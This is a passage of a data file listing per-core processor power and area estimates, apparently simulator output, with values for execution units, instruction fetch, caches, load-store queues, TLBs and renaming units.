'Execution Unit/Floating Point Units/Peak Dynamic': 0.652426,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.211937,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.366999,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.210484,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.78942,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.109464,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.28373,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.123257,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00768289,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.107553,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0568197,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.23081,
'Execution Unit/Register Files/Runtime Dynamic': 0.0645026,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.29611,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.56672,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.13255,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000178688,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000178688,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000154421,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 5.91139e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000816219,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00132802,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00175669,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0546222,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.47444,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.112839,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.185522,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.86416,
'Instruction Fetch Unit/Runtime Dynamic': 0.356067,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0516157,
'L2/Runtime Dynamic': 0.0161653,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.70941,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.732829,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.047632,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0476321,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.93525,
'Load Store Unit/Runtime Dynamic': 1.01537,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.117452,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.234905,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0416842,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0424563,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.216028,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0185079,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.44659,
'Memory Management Unit/Runtime Dynamic': 0.0609641,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 20.143,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.430016,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0160118,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.101218,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.547246,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 4.12836,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0654188,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.254071,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.323124,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0904724,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.145929,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0736599,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.310061,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.053934,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.51489,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.061045,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00379482,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.053159,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.028065,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.114204,
'Execution Unit/Register Files/Runtime Dynamic': 0.0318598,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.12835,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.247496,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.24887,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00010362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00010362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 9.3616e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 3.80798e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000403156,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000704012,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000873326,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0269796,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.71614,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0550252,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0916349,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.01794,
'Instruction Fetch Unit/Runtime Dynamic': 0.175217,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0267443,
'L2/Runtime Dynamic': 0.0089982,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.96831,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.3655,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0236557,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0236557,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.08002,
'Load Store Unit/Runtime Dynamic': 0.505817,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.058331,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.116662,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0207018,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.021102,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.106703,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00902499,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.298374,
'Memory Management Unit/Runtime Dynamic': 0.030127,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.5274,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.160581,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00603611,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0426464,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.209264,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.17829,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0651373,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.25385,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
